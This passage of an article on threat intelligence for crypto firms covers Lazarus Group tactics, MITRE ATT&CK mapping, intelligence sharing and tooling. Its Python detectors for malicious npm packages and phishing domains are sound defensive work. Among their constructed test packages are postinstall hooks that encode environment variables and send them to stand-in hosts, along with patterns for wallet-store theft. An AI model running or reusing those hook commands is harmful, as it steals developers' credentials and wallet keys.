Lateral movement within compromised environments targets the specific personnel and systems with access to private keys, hot wallet infrastructure, and administrative controls over smart contract upgrade mechanisms. The group is known to specifically target engineers with access to deployment keys, treasury multisig signers, and infrastructure administrators with cloud console access.

For a detailed treatment of the operational security failures that expose crypto firms to this threat actor, see our analysis of Lazarus Group operational security failures.

Exfiltration and Laundering

Lazarus Group's post-theft money laundering operations are sophisticated and adaptive. Stolen funds are typically routed through multiple chains using cross-chain bridges, fragmented across numerous intermediate addresses, processed through mixers and privacy protocols, and eventually consolidated for conversion to fiat through over-the-counter brokers and exchanges with weak compliance controls. The group has demonstrated the ability to launder hundreds of millions of dollars across complex multi-chain paths within days of an initial theft event, making rapid response and asset freezing critical in the immediate aftermath of an incident.

MITRE ATT&CK Applied to Blockchain Threats

The MITRE ATT&CK framework provides a structured, community-maintained taxonomy of adversary tactics and techniques. Originally developed for enterprise IT environments, the framework has been extended and adapted for cloud, mobile, and operational technology environments. For Web3 security teams, ATT&CK provides a common language for describing attacker behaviour, a reference library for gap analysis, and a structured basis for threat-informed red team exercises.

Mapping observed attacker behaviour to ATT&CK identifiers serves several practical purposes. First, it enables consistent documentation of threats that can be understood by analysts regardless of their specific background. Second, it provides a structured basis for comparing the TTPs of different threat actors, identifying which adversaries share infrastructure or methodologies. Third, and most practically, it provides a direct mapping from observed adversary behaviour to the defensive controls that MITRE recommends as mitigations, enabling a security team to prioritise their defensive investment based on which techniques are most relevant to their specific threat landscape.

For Web3 firms, the most operationally relevant ATT&CK techniques include: Initial Access (Phishing, T1566; Supply Chain Compromise, T1195; Valid Accounts, T1078); Execution (Command and Scripting Interpreter, T1059, which covers malicious npm install scripts run through developer tooling); Persistence (Boot or Logon Initialization Scripts, T1037; Scheduled Task/Job, T1053); Credential Access (Unsecured Credentials: Credentials In Files, T1552.001, which in Web3 translates directly to theft of key material from configuration files and wallet stores); and Exfiltration (Automated Exfiltration, T1020, and Exfiltration to Cloud Storage, T1567.002, which cover the pattern of malicious packages that immediately send stolen data to attacker-controlled servers).

Maintaining an internal ATT&CK mapping updated as new threat intelligence is produced creates a continuously improving picture of which defensive controls are being tested by active adversaries and which gaps remain unaddressed. This mapping feeds directly into detection engineering, enabling the team to write detection rules targeted at the specific techniques most likely to be used against them. Combined with robust crypto logging and SIEM monitoring, ATT&CK-informed detection rules significantly improve the signal-to-noise ratio of security alerts.
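The mapping from observed behaviour to ATT&CK identifiers, applied to the malicious-package pattern described in the Lazarus section, as an added example that is not part of the original article. It inspects an npm manifest's install-time lifecycle scripts and any bundled source for the behaviours a credential-stealing package needs (reading the environment or a browser wallet store, obfuscation, spawning an interpreter, sending data out), tags each hit with the ATT&CK technique it represents, and escalates to critical only when an install hook, credential access and outbound transfer all co-occur. The rule patterns, the verdict thresholds and both packages are constructed; the long identifier in the wallet-store rule is the Chrome extension ID used for MetaMask.

```python
import json
import re
from typing import Dict, List

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# (label, pattern, ATT&CK id, ATT&CK name). IDs are from MITRE ATT&CK Enterprise.
RULES = [
    ("environment harvest", r"process\.env\b|\bdotenv\b|[\"'][^\"']*\.env[\"']",
     "T1552.001", "Unsecured Credentials: Credentials In Files"),
    ("browser wallet store", r"Local Extension Settings|nkbihfbeogaeaoehlefnkodbefgpgknn|MetaMask",
     "T1552.001", "Unsecured Credentials: Credentials In Files"),
    ("outbound transfer", r"\b(?:curl|wget)\b|https?\.(?:request|get)\(|\bfetch\(|net\.connect|XMLHttpRequest",
     "T1041", "Exfiltration Over C2 Channel"),
    ("obfuscation", r"base64|\beval\(|new Function\(|fromCharCode|\\x[0-9a-fA-F]{2}",
     "T1027", "Obfuscated Files or Information"),
    ("spawned interpreter", r"child_process|\bexec(?:Sync)?\(|\bspawn(?:Sync)?\(|node -e\b",
     "T1059.007", "Command and Scripting Interpreter: JavaScript"),
]
COMPILED = [(label, re.compile(p), tid, tname) for label, p, tid, tname in RULES]


def scan_source(where: str, text: str) -> List[Dict]:
    hits = []
    for label, rx, tid, tname in COMPILED:
        m = rx.search(text)
        if m:
            hits.append({"where": where, "label": label, "attack_id": tid,
                         "attack_name": tname, "match": m.group(0)[:40]})
    return hits


def assess_package(package_json: str, sources: Dict[str, str]) -> Dict:
    """Score an npm package from its manifest and bundled source files."""
    manifest = json.loads(package_json)
    scripts = manifest.get("scripts", {})
    hooks = [h for h in INSTALL_HOOKS if h in scripts]
    findings: List[Dict] = []
    for name, cmd in scripts.items():
        findings += scan_source(f"scripts.{name}", cmd)
    for path, text in sources.items():
        findings += scan_source(path, text)
    ids = {f["attack_id"] for f in findings}
    if hooks and "T1552.001" in ids and "T1041" in ids:
        verdict = "critical"      # runs at install time, reads secrets, sends them out
    elif hooks and findings:
        verdict = "suspicious"
    elif findings:
        verdict = "review"
    else:
        verdict = "clean"
    return {"name": manifest.get("name"), "install_hooks": hooks,
            "attack_ids": sorted(ids), "verdict": verdict, "findings": findings}


# Constructed packages: one mimicking the env-stealing install hook, one benign.
MALICIOUS_PACKAGE = json.dumps({
    "name": "eth-utils-helper",
    "version": "1.0.3",
    "scripts": {
        "postinstall": "node -e \"require('child_process').exec('curl -s https://collector.invalid/?d='"
                       "+Buffer.from(JSON.stringify(process.env)).toString('base64'))\"",
        "test": "jest",
    },
})
MALICIOUS_SOURCES = {
    "index.js": "const p = require('os').homedir() + "
                "'/Library/Application Support/Google/Chrome/Default/Local Extension Settings/"
                "nkbihfbeogaeaoehlefnkodbefgpgknn';",
}
BENIGN_PACKAGE = json.dumps({"name": "tidy-lib", "version": "2.0.0",
                             "scripts": {"build": "tsc", "test": "jest"}})

if __name__ == "__main__":
    print(json.dumps(assess_package(MALICIOUS_PACKAGE, MALICIOUS_SOURCES), indent=2))
    print(assess_package(BENIGN_PACKAGE, {})["verdict"])
```

The point of the technique tags is downstream: a finding carrying T1552.001 and T1041 lands in the same ATT&CK cell as the phishing-delivered stealers the profile already tracks, so the detection and the threat actor profile stay linked. Running `npm install --ignore-scripts` in CI removes the install-hook vector entirely, at the cost of packages that genuinely need a build step.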

Threat Intelligence Sharing and ISACs

No single organisation has full visibility into the threat landscape. Threat actors operate across multiple targets simultaneously, and the indicators, TTPs, and contextual information that one firm observes may be exactly what another firm needs to detect an attack they are currently experiencing. Structured information sharing through trusted peer networks and formal ISACs multiplies the effectiveness of every participant's intelligence capability at marginal additional cost.

The Crypto ISAC is the primary formal information sharing organisation for the digital assets sector. Founded by a consortium of leading exchanges and blockchain firms, it operates as a neutral, vetted hub for distributing sensitive intelligence under controls designed to protect confidentiality. The January 2026 expansion of Coinbase's automated threat feed and Ripple's contribution of DPRK-linked intelligence represent a maturation of the Crypto ISAC model toward the kind of continuous, automated sharing that characterises the most effective financial sector ISACs.

The U.S. Department of the Treasury announced in April 2026 an initiative to share actionable cybersecurity threat intelligence directly with U.S. digital asset firms, extending a category of intelligence-sharing previously reserved for traditional financial institutions. For firms operating within a U.S. regulatory perimeter, this creates an additional formal channel for government-sourced threat intelligence relevant to the crypto sector.

For smaller firms or those in jurisdictions without access to formal ISAC membership, community-level sharing through trusted bilateral relationships with peer security teams, contribution to open-source intelligence repositories such as DeFiHackLabs and SlowMist's InMist network, and participation in the SEAL community provide meaningful sharing benefits. The principle is the same regardless of the formality of the channel: no firm is more secure for hoarding indicators it could share with peers who face the same adversaries.

Developing the internal processes and governance to participate in formal intelligence sharing requires modest but non-trivial investment. The organisation needs a defined policy for what intelligence can be shared externally, a process for anonymising sensitive operational details before sharing, and a named point of contact for inbound intelligence from partner organisations. These are achievable even for small security teams and pay disproportionate returns relative to the effort required.

Staffing, Tooling, and the Minimal Viable CTI Function

A common barrier to building a CTI programme is the perception that it requires a large, dedicated team and significant budget. In practice, a minimal viable CTI function for a mid-size Web3 firm can be built with modest resources, provided the operational scope is defined clearly and the investment is focused on the highest-return activities.

The Minimal Viable Team

A single dedicated analyst, or a security generalist with defined CTI responsibilities allocated at roughly thirty to forty percent of their time, can deliver substantial value if supported by the right processes and tools. The critical requirement is consistency: intelligence work requires regular, sustained attention rather than episodic bursts. A programme that produces a thorough monthly report but does nothing in between is less valuable than one that performs daily feed triage and weekly enrichment activities even if those activities are individually brief.

As the programme matures, dedicated analyst capacity becomes more important. The realistic minimum for a firm managing significant on-chain treasury value or operating critical DeFi infrastructure is one full-time analyst, with access to part-time support from security engineers for detection rule implementation and from legal or compliance for sanctions-related intelligence handling.

Build vs. Buy

Most Web3 firms at the startup or growth stage are better served by a combination of commercial feed subscriptions and managed CTI services than by attempting to build a fully in-house capability. Commercial blockchain analytics platforms, phishing domain monitoring services, and managed dark web monitoring providers can provide comprehensive coverage across the major intelligence domains for a fraction of the cost of hiring the analysts required to source the same intelligence independently.

The in-house component that cannot be outsourced is the integration of external intelligence into internal processes. A managed service can tell you that your brand has been mimicked by three new phishing domains. Only your own team can ensure that information reaches your community managers, updates your detection rules, and is briefed to the relevant leadership. The decision logic, the institutional context, and the connection between intelligence and action must remain internal.

For organisations that cannot justify the investment in an internal capability, a structured engagement with a specialist provider who can deliver cyber threat intelligence for crypto firms as a managed service provides the benefits of a functioning CTI programme without requiring the internal headcount to run it. The key questions when evaluating such a provider are whether they can deliver Web3-specific intelligence combining on-chain and off-chain sources, whether their outputs integrate with your existing security tooling, and whether their analyst team has genuine expertise in the threat actors most relevant to your sector.

Tooling Priorities

For a firm building a CTI capability from scratch, the tooling priorities in order of return on investment are: a blockchain analytics subscription for on-chain wallet monitoring and fund flow analysis; a phishing domain monitoring service covering certificate transparency logs and domain registration data; access to at least one structured threat intelligence platform such as MISP or OpenCTI for storing and enriching indicators; and membership of SEAL-ISAC or Crypto ISAC for peer intelligence sharing.

The integration of these tools with the firm's SIEM and alerting infrastructure closes the loop between intelligence collection and operational detection. An indicator that sits in a threat feed database but never reaches a detection rule or analyst alert has no operational value. The tooling stack must be designed with this integration in mind from the outset.
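The two tooling priorities above, phishing domain monitoring over certificate transparency data and getting the resulting indicators into detection, can be shown end to end in a small script. The following is an added example written for this article, not a tool from the page or from any vendor named in it: it scans certificate transparency entries (constructed here, shaped like certstream's "all_domains" field, which is an assumption about the feed format) for lookalikes of a brand token, emits the matches as indicators, and then runs those indicators against constructed DNS resolver log lines. The brand token "getsecured" and the legitimate domain "getsecured.io" are assumptions; the homoglyph table and the two-label registrable-domain rule are simplifications that a production tool would replace with the public suffix list.

```python
"""Illustrative lookalike-domain monitor written for this article (not a tool from
the page or any vendor). CT entries and DNS log lines below are constructed."""
import re

BRAND = "getsecured"             # assumption: the monitored brand token
OWN_DOMAINS = {"getsecured.io"}  # assumption: the firm's legitimate domains

# Character substitutions commonly used in lookalike registrations.
HOMOGLYPHS = {"rn": "m", "vv": "w", "0": "o", "1": "l", "3": "e",
              "4": "a", "5": "s", "7": "t"}

def normalise(label: str) -> str:
    """Fold homoglyphs and separators so 'g3t-secured' compares equal to 'getsecured'."""
    label = label.lower()
    for bad, good in HOMOGLYPHS.items():
        label = label.replace(bad, good)
    return label.replace("-", "").replace("_", "")

def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def registrable_domain(host: str) -> str:
    """Simplified: last two labels. A production tool uses the public suffix list."""
    return ".".join(host.split(".")[-2:])

def classify(name: str):
    """Return (indicator, reason) if the name looks like a brand lookalike, else None."""
    host = name.lower().lstrip("*.")
    reg = registrable_domain(host)
    if reg in OWN_DOMAINS:
        return None
    norm = normalise(reg.split(".")[0])
    if norm == BRAND:
        return reg, "brand on another TLD or with homoglyphs"
    if BRAND in norm:
        return reg, "brand embedded in registrable label"
    dist = levenshtein(norm, BRAND)
    if dist <= 2:
        return reg, f"edit distance {dist} from brand"
    if any(BRAND in normalise(label) for label in host.split(".")[:-2]):
        return host, "brand used as a subdomain of an unrelated domain"
    return None

CT_ENTRIES = [  # constructed, shaped like certstream's leaf_cert.all_domains field
    {"all_domains": ["getsecured.io", "www.getsecured.io"]},
    {"all_domains": ["g3tsecured.io"]},
    {"all_domains": ["getsecured-airdrop.xyz", "www.getsecured-airdrop.xyz"]},
    {"all_domains": ["getsecured.login.example.net"]},
    {"all_domains": ["github.com"]},
]

def indicators_from_ct(entries):
    """Collapse CT entries into {indicator_domain: reason}."""
    found = {}
    for entry in entries:
        for name in entry["all_domains"]:
            hit = classify(name)
            if hit:
                found.setdefault(hit[0], hit[1])
    return found

DNS_LOG = [  # constructed resolver log lines
    "2026-06-18T09:14:02Z src=10.20.4.17 qname=api.getsecured.io qtype=A",
    "2026-06-18T09:15:47Z src=10.20.4.31 qname=g3tsecured.io qtype=A",
    "2026-06-18T09:16:10Z src=10.20.4.31 qname=cdn.getsecured-airdrop.xyz qtype=A",
    "2026-06-18T09:17:55Z src=10.20.4.52 qname=github.com qtype=A",
]
FIELD = re.compile(r"(\w+)=(\S+)")

def match_logs(indicators, lines):
    """Return (src, qname, indicator, reason) for every query that touches an indicator."""
    hits = []
    for line in lines:
        fields = dict(FIELD.findall(line))
        qname = fields.get("qname", "").lower()
        for ioc, reason in indicators.items():
            if qname == ioc or qname.endswith("." + ioc):
                hits.append((fields.get("src"), qname, ioc, reason))
    return hits

if __name__ == "__main__":
    iocs = indicators_from_ct(CT_ENTRIES)
    for ioc, reason in iocs.items():
        print(f"indicator {ioc}: {reason}")
    for src, qname, ioc, reason in match_logs(iocs, DNS_LOG):
        print(f"ALERT host {src} resolved {qname} ({ioc}: {reason})")
```

The point of the second half is the one the paragraph above makes: the three indicators the CT scan produces are only useful because the same script turns them into a match against resolver logs, which is the step that reaches an analyst. In a real deployment the indicator dictionary would be pushed into MISP or OpenCTI and the matching logic would live in the SIEM, but the shape of the loop is the same.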

Security teams building out this function for the first time often find that the human and process elements constrain outcomes more than the tooling. The most sophisticated analytical platform produces no value if there is no defined workflow for what happens when an analyst flags a high-confidence indicator. Investing in process documentation and analyst workflow design before expanding the tooling stack is consistently the higher-return choice.

Frequently Asked Questions

What is cyber threat intelligence in the context of blockchain and Web3?

Cyber threat intelligence (CTI) in Web3 is the systematic collection, analysis, and operationalisation of information about adversaries, attack methods, and indicators of compromise relevant to crypto infrastructure, personnel, and protocols. Unlike traditional CTI, it combines on-chain data sources such as blockchain analytics and wallet tracking with off-chain sources including dark web monitoring, Telegram channel surveillance, and phishing domain tracking. The output is actionable intelligence that security teams can use to pre-position defences, update detection rules, and brief leadership before an attack materialises rather than after.

What is the difference between on-chain and off-chain threat intelligence for crypto firms?

On-chain threat intelligence is derived directly from blockchain data: monitoring known threat actor wallet movements, anomaly detection in transaction patterns, mempool surveillance for front-running and sandwich attack signatures, and tracking fund flows following an exploit. Off-chain threat intelligence covers everything outside the blockchain ledger: dark web forums, Telegram and Discord channels used by threat actors, phishing domain registrations, paste site postings of leaked credentials, social engineering campaign monitoring, and code repository scans for hardcoded private keys or leaked secrets. An effective CTI programme integrates both layers, because most attacks are planned and resourced off-chain before any on-chain activity becomes visible.
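One of the on-chain signatures named above, the sandwich attack, can be expressed as a concrete pattern over a block's swaps. The following is an added example written for this article, not code from the page: it takes a list of swaps (constructed, with placeholder addresses rather than real chain data) and looks for the simplest sandwich shape, where one sender trades in the same direction as a victim immediately before it and in the opposite direction immediately after it, on the same pool in the same block. The "max_gap" parameter controls how many transaction positions apart the legs may sit; that loosening, and the assumption that all three legs are visible in one block and one pool, are simplifications, so treat the output as a lead for an analyst rather than proof.

```python
"""Illustrative sandwich-attack detector written for this article; not code
from the page. The swaps below are constructed, not real chain data."""
from collections import Counter, defaultdict
from dataclasses import dataclass

@dataclass(frozen=True)
class Swap:
    block: int
    index: int    # transaction index within the block
    sender: str   # EOA that sent the transaction
    pool: str     # pool / pair address the swap executed against
    buy: bool     # True = buys the pool's base token, False = sells it

def find_sandwiches(swaps, max_gap=1):
    """Return (front_run, victim, back_run) triples.

    Heuristic signature: within one block and one pool, sender A trades in the
    same direction as victim V at most max_gap positions before V, then trades
    in the opposite direction at most max_gap positions after V. Real bundles
    can route through several pools or private relays; this is the simplest
    shape and is meant as a starting signature, not a proof."""
    groups = defaultdict(list)
    for s in swaps:
        groups[(s.block, s.pool)].append(s)
    found = []
    for group in groups.values():
        group.sort(key=lambda s: s.index)
        for victim in group:
            fronts = [f for f in group
                      if f.sender != victim.sender and f.buy == victim.buy
                      and 0 < victim.index - f.index <= max_gap]
            for front in fronts:
                backs = [b for b in group
                         if b.sender == front.sender and b.buy != victim.buy
                         and 0 < b.index - victim.index <= max_gap]
                found.extend((front, victim, b) for b in backs)
    return found

def suspect_senders(triples):
    """Count how many sandwiches each front-running address appears in."""
    return Counter(front.sender for front, _, _ in triples)

SWAPS = [  # constructed; addresses are placeholders
    Swap(100, 10, "0xA77ac", "0xPool1", True),    # A buys
    Swap(100, 11, "0xV1c71", "0xPool1", True),    # victim buys, price moves up
    Swap(100, 12, "0xA77ac", "0xPool1", False),   # A sells into the moved price
    Swap(100, 13, "0xC0ffee", "0xPool1", False),  # unrelated seller
    Swap(100, 20, "0xD00d", "0xPool2", True),
    Swap(100, 21, "0xE11e", "0xPool2", True),
    Swap(100, 22, "0xD00d", "0xPool2", True),     # same direction twice: not a sandwich
    Swap(101, 3, "0xA77ac", "0xPool1", True),
    Swap(101, 7, "0xV1c71", "0xPool1", True),     # four positions after A's first leg
    Swap(101, 8, "0xA77ac", "0xPool1", False),
]

if __name__ == "__main__":
    for gap in (1, 5):
        triples = find_sandwiches(SWAPS, max_gap=gap)
        print(f"max_gap={gap}: {len(triples)} sandwich(es), senders {dict(suspect_senders(triples))}")
```

With adjacent legs only (max_gap=1) the block-100 triple is found and the block-101 one is not; widening the gap to five positions picks up the second, which is the usual trade-off in this kind of signature between missing spread-out bundles and flagging coincidental trades. Addresses that recur as the front-running leg are the natural output to hand to the wallet-monitoring side of the programme.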

What are the known tactics and techniques used by Lazarus Group against crypto firms?

Lazarus Group, the North Korean state-sponsored threat actor, targets crypto firms with a consistent set of tactics. These include spear-phishing campaigns with highly personalised lures referencing the target's specific role and projects; fake job offer operations where threat actors pose as recruiters from credible firms and deliver malware through interview task documents or coding challenges; social engineering of developers and DevOps staff to obtain credentials or install backdoors; and supply chain poisoning through malicious npm and PyPI packages that exfiltrate environment variables and crypto wallet data. The group exhibits long dwell times inside compromised networks, sometimes operating undetected for weeks or months before triggering a theft event. Groups aligned with Lazarus have been linked to some of the largest single-incident losses in crypto history.
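The supply chain technique described above, a package whose install-time script reads environment variables and ships them off-host, is one a dependency-review step can look for before the package ever executes. The following is an added example written for this article, not code from the page or from any named project: it scans package.json manifests (constructed, with fictional package names and a documentation-range IP) for npm lifecycle hooks and grades each by heuristic patterns for network access, environment reads, dynamic execution, encoding, and secret paths. The patterns are hints rather than proof, and a real deployment would run this over every package.json under node_modules as part of CI.

```python
"""Illustrative npm lifecycle-script scanner written for this article; not
code from the page. The package manifests below are constructed."""
import json
import re

# Scripts npm runs automatically during install, so a poisoned dependency
# executes without the developer ever importing it.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic patterns; each is a hint, not proof of malice.
SUSPICIOUS = [
    (re.compile(r"\bcurl\b|\bwget\b|fetch\(|https?://|require\(['\"]https?['\"]\)"),
     "network access"),
    (re.compile(r"process\.env|printenv|\$\{?[A-Z_]{3,}\}?"), "reads environment variables"),
    (re.compile(r"node\s+-e\b|\beval\(|new Function\(|child_process"), "dynamic code execution"),
    (re.compile(r"base64|atob\(|fromCharCode"), "encoded payload"),
    (re.compile(r"\.ssh\b|keystore|wallet|mnemonic|(?:^|[\s/'\"])\.env\b"),
     "touches secret or wallet paths"),
]

def scan_manifest(text: str) -> list:
    """Grade every lifecycle hook in one package.json."""
    pkg = json.loads(text)
    findings = []
    for hook, script in pkg.get("scripts", {}).items():
        if hook not in LIFECYCLE_HOOKS:
            continue
        reasons = [label for rx, label in SUSPICIOUS if rx.search(script)]
        severity = "high" if len(reasons) >= 2 else "medium" if reasons else "info"
        findings.append({"package": pkg.get("name"), "hook": hook,
                         "script": script, "reasons": reasons, "severity": severity})
    return findings

def scan_tree(manifests: dict) -> list:
    """manifests: {path: package.json text}, e.g. every node_modules/**/package.json."""
    out = []
    for path, text in manifests.items():
        for finding in scan_manifest(text):
            out.append({"path": path, **finding})
    order = ("high", "medium", "info")
    return sorted(out, key=lambda f: order.index(f["severity"]))

MANIFESTS = {  # constructed; package names are fictional, 203.0.113.0/24 is a documentation range
    "node_modules/fast-json-x/package.json": json.dumps({
        "name": "fast-json-x", "version": "2.1.0",
        "scripts": {"postinstall": "node-gyp rebuild", "test": "jest"}}),
    "node_modules/git-hooks-setup/package.json": json.dumps({
        "name": "git-hooks-setup",
        "scripts": {"prepare": "node scripts/setup-hooks.js"}}),
    "node_modules/eth-utils-helper/package.json": json.dumps({
        "name": "eth-utils-helper", "version": "1.0.3",
        "scripts": {"postinstall":
            "node -e \"const h=require('https');"
            "const d=Buffer.from(JSON.stringify(process.env)).toString('base64');"
            "h.request({hostname:'203.0.113.7',path:'/c?d='+d,method:'POST'}).end()\""}}),
    "node_modules/telemetry-ping/package.json": json.dumps({
        "name": "telemetry-ping",
        "scripts": {"postinstall": "curl -s https://203.0.113.9/telemetry"}}),
}

if __name__ == "__main__":
    for f in scan_tree(MANIFESTS):
        print(f"[{f['severity']}] {f['package']} {f['hook']}: {', '.join(f['reasons']) or 'lifecycle hook present'}")
```

Native build steps such as node-gyp legitimately use postinstall, which is why a hook on its own is only informational; the combination of an inline node -e payload, an environment read, encoding and an outbound request is what lifts the fictional eth-utils-helper entry to high. A practical control is to fail the build on high findings and to run installs with --ignore-scripts until a reviewer has looked at the flagged packages.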

How does MITRE ATT&CK apply to blockchain and crypto security?

The MITRE ATT&CK framework provides a structured taxonomy of adversary tactics and techniques that security teams can use to map observed attacker behaviour to documented methods and then identify corresponding defensive controls. For crypto firms, the framework applies at the infrastructure layer: initial access via phishing and supply chain compromise, execution via malicious scripts delivered through developer tooling, persistence through backdoored dependencies, credential access targeting private keys and seed phrases, and exfiltration of wallet data to attacker-controlled servers. By mapping known threat actor TTPs to ATT&CK identifiers, a security team can prioritise defensive gaps, write detection rules tuned to observed patterns, and conduct red team exercises that accurately simulate realistic adversary behaviour.

How should a Web3 firm get started building a threat intelligence programme?

A practical starting point is to define intelligence requirements before acquiring any tooling. What decisions does your security team or board need to make, and what information would help them make better decisions faster? From there, map your critical assets: smart contracts, private keys, admin wallets, developer workstations, and cloud infrastructure. Subscribe to free and low-cost feeds first: DeFiHackLabs on GitHub, the SlowMist Hacked database, Rekt News, and SEAL-ISAC if eligible. Assign a named analyst responsible for weekly triage even if part-time. Establish a structured process for converting raw data into finished intelligence products: brief summaries with a confidence rating, relevant TTPs, and recommended actions. Finally, integrate intelligence outputs into your incident response runbooks so that when a known threat actor pattern is observed, the team already has a playbook ready.
